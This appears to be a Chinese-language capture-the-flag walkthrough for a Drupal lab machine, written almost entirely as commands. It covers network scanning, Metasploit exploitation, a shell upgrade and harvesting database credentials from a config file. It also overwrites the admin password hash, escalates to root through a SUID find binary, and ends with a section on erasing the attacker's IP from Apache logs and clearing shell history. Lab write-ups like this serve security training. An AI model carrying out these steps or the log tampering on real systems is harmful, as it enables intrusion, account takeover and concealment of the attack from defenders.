1. 信息搜集
1.1. 主机发现
1
2
3
4
arp-scan -l
namp -T4 -A -p- 192.168.163.131 # 扫描端口
dirb http://192.168.163.131 # 扫描目录
whatweb -v 192.168.163.131
1.2. 渗透
1
2
3
4
5
6
7
msfconsole
> search drupal
> use <id>
> set payload payload/...
> set rhosts <ip>
> options
> run
1.2.1. 获取 flag1
提示查找配置文件
1.2.2. 获取 flag2
1
2
3
shell
python -c "import pty;pty.spawn('/bin/bash')" #优化显示
find . -name "set*" #搜索设置文件
1.2.3. 获取 flag3
获取到数据库信息
1
2
3
'database' => 'drupaldb',
'username' => 'dbuser',
'password' => 'R0ck3t',
1
mysql -h 127.0.0.1 -P 3306 -u dbuser -pR0ck3t
use drupaldb;
show tables;
show columns from users;
select * from users where uid=1;
update users set pass="$S$DQCOKBJdDlel6L.ZfV1tYbTccflz6hwDisRxE25daht/qoX.Bb6g" where uid=1;
1
2
3
4
find . -name "*.sh"
./scripts/password-hash.sh 123
# admin原密码 $S$DvQI6Y600iNeXRIeEMF94Y6FvN8nujJcEDTCP9nS5.i38jnEKuDR
# 现密码(123) $S$DQCOKBJdDlel6L.ZfV1tYbTccflz6hwDisRxE25daht/qoX.Bb6g
admin 登录,搜索页面发现 flag3
1.2.4. 获取 flag4
1
2
3
cat /etc/passwd
ls /home/flag4
cat /home/flag4/flag4.txt
1.2.5. 获取 flag5
按提示提权
1
2
3
find / -perm -4000 -type f 2>/dev/null # 判断是否能提权
find / -perm -u=s -type f 2>/dev/null
find / -exec "/bin/bash" -p \; # 提权
提权成功,获取 flag5
2. 痕迹清除
2.1. 网站日志清除
1
2
3
4
find / -type f -name "access*"
sed -i '/192.168.163.132/d' /var/log/apache2/access.log
find / -type f -name "error*"
sed -i '/192.168.163.132/d' /var/log/apache2/error.log
2.2. 数据库恢复和日志清除
show global variables like "%log%";
2.3. history
1
history -c
